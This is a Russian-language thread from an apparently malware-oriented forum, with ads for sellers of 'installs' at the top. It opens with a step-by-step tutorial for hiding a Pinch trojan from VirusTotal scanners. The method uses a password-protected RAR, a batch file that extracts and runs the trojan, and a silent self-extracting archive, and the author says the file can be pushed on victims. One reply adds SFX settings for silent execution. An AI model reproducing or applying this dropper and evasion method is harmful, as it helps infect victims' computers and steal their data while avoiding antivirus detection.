contact us rules avd support awards upload blog group gallery home


 



|LoadsSell.net - Мы продаем загрузки| |PlohihZagRusOK.net - у нас нет плохих загрузок| |installsmarket.net - качественные загрузки любых стран| |installsdealer.com - Ваши дилеры на рынке инсталлов| |ZagruzkiNah.Com - чоткие загрузы|

Старый 21.06.2010   #1
Nik9

Windows v.1.01

Регистрация: 12.12.2009
Сообщений: 7
Поблагодарили всего: 9
за это сообщение: 1
По умолчанию Скрытие файла

В данной статье излагается нехитрый, но 100% работающий способ сокрытия зараженного файла от ЛЮБЫХ антивирусов на Virustotal.Com. Для применения описанного способа нам понадобится программа WinRar. Описанное тестировалось на версии 3.62.
Итак, поехали...
У нас имеется троянский файл prog.exe, содержащий, к примеру, билд трояна Pinch 2.58. Необходимо, чтобы антивирус не детектировал его как зараженный. Для этого воспользуемся следующей методикой.
Во-первых создадим папку и положим туда билд трояна. Затем зайдем в папку с WinRar и скопируем в эту папку консольный архиватор rar.exe
Теперь создадим с помощью WinRar зашифрованый rar-архив, с именем prog.rar с файлом трояна(prog.exe).Пароль на архив к примеру, будет passw0rd.
Для распаковки и автозапуска трояна напишем bat-файл следующего содержания:

rar e -ppassw0rd prog.rar - здесь мы распаковываем троян в текущую папку. после ключа -p идет пароль
prog.exe - запускаем троян

Для того чтобы объединить 3 файла в 1, можно воспользоваться каким-нибудь джойнером(если он паблик, то будет палиться вся сброка) однако мы воспользуемся все тем же WinRar'ом.
Для этого создадим самораспаковывающийся архив, в который добавим файлы prog.rar и rar.bat с приведенным выше содержимым. При создании архива в диалоге "Имя и параметры архива" на вкладке "Общие" отметим чекбокс "Создать SFX-фрхив", затем перейдем на вкладку "Дополнительно", нажмем там кнопку "Параметры SFX". В открвышемся окне на вкладке "Общие" введем в поле ввода "Выполнить после распаковки" имя нашего bat-файла rar.bat
Затем перейдем на вкладку "Режимы", отметим там чекбокс "Распаковать во временную папку", в рамочке "Режим вывода информации" нажмем радиокнопку "Скрыть все", а в рамочке "Режим перезаписи" на всякий случай - "Перезаписывать все файлы"

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

Сохраним значения и создадим архив нажатием кнопок "OK". Теперь полученный файл можно смело впаривать жертве, не опасаясь, что Virustotal.Com обнаружит в нем вирусы. При запуске архив prog.rar автоматически распакуется во временную папку и будет расшифрован с указаным паролем.
Естественно, у описанного способа есть огромный недостаток - нормальный антивирус запалит троян в момент распаковки из второго архива. Однако многие жертвы не держат антивируса с актуальными базами, а грузат файлы на вирустотал, касперского и другие серваки, а при простом сканировании такой файл выявить практически невозможно.
Nik9 вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Сказали спасибо:
M@ZAX@KEP (13.08.2010)
Старый 21.06.2010   #2
olegteror

Почетный пользователь
 
Аватар для olegteror

Регистрация: 02.04.2010
Адрес: /dev/mozg >>/dev/null
Сообщений: 819
Поблагодарили всего: 750
за это сообщение: 0
Отправить сообщение для olegteror с помощью ICQ Отправить сообщение для olegteror с помощью Skype™
По умолчанию

помойму..повтор...
__________________
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
olegteror вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 30.06.2010   #3
1.kla$

Windows v.3.1

Регистрация: 26.06.2010
Сообщений: 50
Поблагодарили всего: 9
за это сообщение: 0
По умолчанию

нет такого точно небыло
1.kla$ вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 30.06.2010   #4
_Stealer_

Супер-модератор
 
Аватар для _Stealer_

Регистрация: 17.09.2009
Сообщений: 209
Поблагодарили всего: 240
за это сообщение: 0
Отправить сообщение для _Stealer_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Nik9;12362

[Ссылки могут видеть только зарегистрированные и активированные пользователи
смешно получилось
_Stealer_ вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 30.06.2010   #5
Malcolm

Windows v.3.1

Регистрация: 01.06.2010
Сообщений: 56
Поблагодарили всего: 9
за это сообщение: 0
По умолчанию

Бездумный копипаст с какого-то сайта. + ещё с этим г*вном как показал [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Malcolm вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 02.07.2010   #6
steepx

Windows v.2.03

Регистрация: 30.03.2010
Сообщений: 20
Поблагодарили всего: 1
за это сообщение: 0
По умолчанию

Цитата:
Сообщение от Malcolm Посмотреть сообщение
Бездумный копипаст с какого-то сайта. + ещё с этим г*вном как показал [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
согласен!!!
steepx вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 05.07.2010   #7
kristal

Windows v.2.03

Регистрация: 11.04.2010
Сообщений: 15
Поблагодарили всего: 4
за это сообщение: 0
По умолчанию

А в чем польза то?Ну спрятали...так распаковка все равно выполняется и если файл плохо закриптован, то AV его спалит, а если закриптован и не палиться,то какой смысл в этом?
kristal вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Старый 10.07.2010   #8
ihtr3

Windows v.3.0
 
Аватар для ihtr3

Регистрация: 01.10.2009
Сообщений: 43
Поблагодарили всего: 6
за это сообщение: 0
По умолчанию

В настройках SFX сделай выполнить "название твое проги" до распаковки а после del "название твое проги"...
или

Path=%windir%
SavePath
Setup=name.jpg
Presetup=name.exe
Silent=1
Overwrite=1

(помоему так)

Последний раз редактировалось ihtr3; 10.07.2010 в 05:52.
ihtr3 вне форума  
Сказали 'Спасибо' за это сообщение.
Ответить с цитированием
Ответ

Нижняя навигация
Вернуться   Fuck Anti Virus > Работаем с файлами > Статьи


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

(Подробнее Тему прочитали: 62
1.kla$, 100, acumc, alex, An0nim, anaxanim, Ape][i, atiradeon, BAHEK, bed, budora, buurenex, Chekit, chester, cucka, cuker, cyk10id, Dadada, darkest, Dave, Deymos, dosha, dum_forever, duse_bigolow, hadrad, hafer, ihtr3, ilyar68, jessop, Jimmy, kikamazafuka, Killer7, kokes, kristal, laesty, M@ZAX@KEP, madlian, Malcolm, marishkou, master008, MaxIMus94, moonden, Nik9, nikitoss97, Ninja, olegteror, ostapas, Reptiliy, Samopal, sanek1804, steepx, S_I_D, TAYSN, travakur, VAN32, vazonez, Wazzup, xLime, zer0, zloypupkin, Денис, _Stealer_
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +4, время: 03:12.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd. Перевод: zCarot